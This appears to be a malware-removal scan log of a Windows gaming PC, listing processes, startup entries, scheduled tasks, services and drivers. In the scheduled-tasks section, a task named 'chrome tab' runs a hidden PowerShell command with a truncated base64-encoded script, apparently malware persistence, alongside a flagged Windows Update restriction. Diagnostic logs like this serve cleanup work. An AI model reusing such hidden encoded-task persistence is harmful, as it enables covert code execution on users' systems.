 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe ->) (Adobe Inc. -> ) C:\Program Files (x86)\Adobe\Adobe Sync\CoreSync\CoreSync.exe
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud Helper.exe <2>
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\Adobe Installer.exe
(C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64\EpicWebHelper.exe <2>
(C:\Program Files (x86)\ONN\onn.exe ->) () [File not signed] C:\Program Files (x86)\ONN\KbDaemon.exe
(C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7>
(C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe ->) (OpenJS Foundation -> Node.js) C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe <2>
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\CCLibrary.exe
(C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\CCLibrary.exe ->) (OpenJS Foundation -> Node.js) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\libs\node.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCopyAccelerator.exe
(C:\Riot Games\Riot Client\RiotClientServices.exe ->) () [File not signed] C:\Riot Games\Riot Client\RiotClientCrashHandler.exe
(C:\Riot Games\Riot Client\RiotClientServices.exe ->) (Riot Games, Inc. -> Riot Games) C:\Riot Games\VALORANT\live\VALORANT.exe
(C:\Riot Games\VALORANT\live\ShooterGame\Binaries\Win64\VALORANT-Win64-Shipping.exe ->) (Riot Games, Inc. -> Epic Games, Inc.) C:\Riot Games\VALORANT\live\Engine\Binaries\Win64\UnrealCEFSubProcess.exe
(C:\Riot Games\VALORANT\live\VALORANT.exe ->) (Riot Games, Inc. -> CN) C:\Riot Games\VALORANT\live\ShooterGame\Binaries\Win64\VALORANT-Win64-Shipping.exe
(cmd.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Discord Inc. -> Discord Inc.) C:\Users\Miggy\AppData\Local\Discord\app-1.0.9005\Discord.exe <6>
(explorer.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
(explorer.exe ->) (Globalhop Ltd -> ) C:\Users\Miggy\AppData\Local\Programs\RestMinder\RestMinder.exe
(explorer.exe ->) (Mega Limited -> Mega Limited) C:\Users\Miggy\AppData\Local\MEGAsync\MEGAsync.exe
(explorer.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingApp_2207.1001.5.0_x64__8wekyb3d8bbwe\XboxAppServices.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgtray.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Riot Games\Riot Client\RiotClientServices.exe
(explorer.exe ->) (Shenzhen Evision Semiconductor Technology Co., Ltd -> ) C:\Program Files (x86)\ONN\onn.exe
(explorer.exe ->) (Spotify AB -> Spotify Ltd) C:\Users\Miggy\AppData\Roaming\Spotify\Spotify.exe <6>
(explorer.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler64.exe
(Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.30001.0_x64__8wekyb3d8bbwe\gamingservices.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.30001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\NisSrv.exe
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe <2>
(services.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgc.exe
(services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(services.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\steamservice.exe
(svchost.exe ->) (Adobe Systems Incorporated) C:\Program Files\WindowsApps\AdobeNotificationClient_3.0.1.1_x86__enpm4xejd91yc\AdobeNotificationClient.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_11.2205.23.0_x64__8wekyb3d8bbwe\Time.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\GameBarPresenceWriter.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MoUsoCoreWorker.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
 
==================== Registry (Whitelisted) ===================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\RtkAudUService64.exe [856288 2019-10-29] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3071232 2022-06-29] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3427104 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [129288 2021-08-04] (Adobe Inc. -> )
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [850208 2022-05-12] (Adobe Inc. -> Adobe Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Discord] => C:\Users\Miggy\AppData\Local\Discord\Update.exe [1512760 2020-12-03] (Discord Inc. -> GitHub)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32699856 2022-07-14] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4282328 2022-06-06] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [com.blitz.app] => C:\Users\Miggy\AppData\Local\Programs\Blitz\Blitz.exe --autostart (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Spotify] => C:\Users\Miggy\AppData\Roaming\Spotify\Spotify.exe [19970464 2022-07-08] (Spotify AB -> Spotify Ltd)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [NZXT.CAM] => C:\Program Files\NZXT CAM\NZXT CAM.exe --startup (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [RestMinder] => C:\Users\Miggy\AppData\Local\Programs\RestMinder\RestMinder.exe [199232 2021-09-06] (Globalhop Ltd -> )
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Medal] => C:\Users\Miggy\AppData\Local\Medal\update.exe [1901144 2022-01-09] (Ferox Games B.V. -> )
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Energy] => C:\Users\Miggy\AppData\Roaming\Energy\Energy.exe --fTZuKpU (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3148016 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [ONN.] => C:\Program Files (x86)\ONN.\onn.exe [4436120 2021-11-14] (Shenzhen Evision Semiconductor Technology Co., Ltd -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\103.0.5060.114\Installer\chrmstp.exe [2022-07-04] (Google LLC -> Google LLC)
Startup: C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMVU.lnk [2021-10-17]
ShortcutTarget: IMVU.lnk -> C:\Users\Miggy\AppData\Roaming\IMVUClient\IMVUQualityAgent.exe (No File)
Startup: C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2022-06-05]
ShortcutTarget: MEGAsync.lnk -> C:\Users\Miggy\AppData\Local\MEGAsync\MEGAsync.exe (Mega Limited -> Mega Limited)
 
==================== Scheduled Tasks (Whitelisted) ============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0EC66224-E7F9-4896-AC22-604F9481BFD0} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-2826498334-1472090739-1589450912-1002 => C:\Users\Miggy\AppData\Local\MEGAsync\MEGAupdater.exe [2531504 2022-06-23] (Mega Limited -> )
Task: {186D8709-E02A-4B19-ABAC-627A0E438748} - System32\Tasks\Opera GX scheduled Autoupdate 1643160997 => C:\Users\Miggy\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0) (No File)
Task: {19056965-D8E2-42BA-9198-BA321F141CBC} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {1D22A23D-A8AC-4920-9D07-A55F94E7D9EF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {252A9582-5B4F-4191-9010-B1BB0DFF8B00} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {2C3DB3C3-1853-4F46-9049-ADE90B75A3FA} - System32\Tasks\chrome tab => cmd /c powershell -WindowStyle Hidden -E "CgAKAAoAJABqAGQAIAA9ACAAJABuAHUAbABsADsACgAKACQAZQBuAGMAUwB0AHIAQQBzAGMAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAOwAKACQAagBwAD0AJABuAHUAbABsADsACgAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAVgBhAGwAdQBlAE4AZQB3ACgAWwBzAHQAcgBpAG (the data entry has 4955 more characters). <==== ATTENTION
Task: {316B07D7-B842-4CA6-9143-E47A44373CE9} - System32\Tasks\Mozilla\Firefox Background Update 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\firefox.exe --MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask backgroundupdate
Task: {34FBA49C-DB6E-466D-9949-8BA989A2D755} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {34FF53DA-910C-48FF-A27B-6C77610DC964} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1003128 2022-03-01] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {35A6F66D-DC69-4521-8F02-D46FEAA910DC} - System32\Tasks\Microsoft\Windows\CUAssistant\CULauncher => C:\Program Files\CUAssistant\culauncher.exe (No File)
Task: {3A4DAEC6-DB69-41C4-B1CD-2D21D21DAF48} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [52104 2017-04-24] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {592A03EA-5CC2-4DCE-8D23-D389B778676B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7837ED71-57CE-4F2F-9588-701188B7FA26} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3427104 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {8B92C189-E256-455B-B83D-BB9EA201CEC2} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3342080 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {967C49C7-7365-496B-84CC-F943F6485839} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9B6AA54B-A7A6-44EE-B7FB-7023090FBCC6} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {B22F7ED0-E54D-4755-BF66-7C277C4F783F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-07-31] (Google LLC -> Google LLC)
Task: {C52D7066-5B3F-408A-AF5C-CCC3BD7E9982} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [646344 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {D1EBC865-4929-4089-875B-C0F67EC2595B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-07-31] (Google LLC -> Google LLC)
Task: {DAF682D5-38DA-494C-96CE-78534D6E588E} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {EACF08E7-F007-4892-8304-796E244D2C74} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {F0E4183A-6ABA-4A9B-B752-1347AA639C62} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {FC1BCD53-BD5F-46F6-B451-6482CD8B026A} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{37bbd38f-8acb-4c40-b864-ada8bb32978f}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{414f2442-2e8a-4d1e-a13b-9d87f203ed03}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{5c61890f-5044-4e9c-8570-a54ea7f72db7}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{c27cbc7d-a6d2-4954-a213-802ef8bff43d}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{f885ed82-1422-4cda-906b-0d4ab502143f}: [DhcpNameServer] 192.168.254.254
 
Edge: 
=======
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
Edge DefaultProfile: Default
Edge Profile: C:\Users\Miggy\AppData\Local\Microsoft\Edge\User Data\Default [2022-04-28]
 
FireFox:
========
FF DefaultProfile: 3lkpfjap.default
FF ProfilePath: C:\Users\Miggy\AppData\Roaming\Mozilla\Firefox\Profiles\3lkpfjap.default [2021-07-09]
FF ProfilePath: C:\Users\Miggy\AppData\Roaming\Mozilla\Firefox\Profiles\wmxmjnvg.default-release [2022-07-15]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2022-05-12] (Adobe Inc. -> Adobe Systems)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2022-05-12] (Adobe Inc. -> Adobe Systems)
 
Chrome: 
=======
CHR Profile: C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default [2022-07-16]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2022-07-05]
CHR Extension: (Adblock for Youtube™) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmedhionkhpnakcndndgjdbohmhepckk [2022-07-11]
CHR Extension: (Google Docs Offline) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-06-14]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Profile: C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\System Profile [2020-07-31]
 
==================== Services (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [919328 2022-04-18] (Adobe Inc. -> Adobe Inc.)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3815712 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3580200 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
R3 EABackgroundService; C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe [11152008 2022-07-14] (Electronic Arts, Inc. -> Electronic Arts)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [811496 2022-06-21] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [553264 2020-12-28] (EasyAntiCheat Oy -> Epic Games, Inc.)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029456 2022-07-14] (Epic Games Inc. -> Epic Games, Inc.)
S3 EQU8_19; C:\ProgramData\EQU8\Totally Accurate Battlegrounds\bin\anticheat.x64.equ8.exe [6221456 2021-10-02] (Int3 Software AB -> Int3 Software AB)
S3 EQU8_4; C:\ProgramData\EQU8\AimLab\bin\anticheat.x64.equ8.exe [8468624 2021-12-18] (Int3 Software AB -> Int3 Software AB)
S2 GameInput Service; C:\Program Files (x86)\Microsoft GameInput\x64\gameinputsvc.exe [75240 2022-05-25] (Microsoft Corporation -> Microsoft Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2575624 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3494672 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13086224 2020-07-20] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R3 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10452496 2022-06-29] (Riot Games, Inc. -> Riot Games, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\NisSrv.exe [3120992 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe [133544 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 zksvc; C:\Program Files\Common Files\PUBG\zksvc.exe [8737992 2022-01-23] (PUBG CORPORATION -> PUBG Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem
 
===================== Drivers (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
S3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [File not signed]
S3 EQU8_HELPER_19; C:\WINDOWS\system32\DRIVERS\EQU8_HELPER_19.sys [38032 2021-10-08] (Int3 Software AB -> )
S3 gdrv; C:\Windows\gdrv.sys [25640 2020-07-01] (Giga-Byte Technology -> Windows ® Server 2003 DDK provider)
R3 HHTHid; C:\WINDOWS\System32\drivers\HHTHid.sys [24784 2019-10-10] (Shenzhen Evision Semiconductor Technology Co.,Ltd. -> 0)
R3 HHTHid_ArtvhMouFiltr; C:\WINDOWS\System32\drivers\HHTHidMouFiltr.sys [23896 2019-10-10] (Shenzhen Evision Semiconductor Technology Co.,Ltd. -> 0)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48552 2021-10-31] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation)
S3 VCamSDK; C:\WINDOWS\system32\DRIVERS\VCamSDK.sys [1090904 2019-12-22] (Shanghai Yitu Information Technology Co.,Ltd. -> e2eSoft)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [8607648 2022-06-29] (Riot Games, Inc. -> Riot Games, Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [49576 2022-06-22] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [452856 2022-06-22] (Microsoft Windows -> Microsoft Corporation)
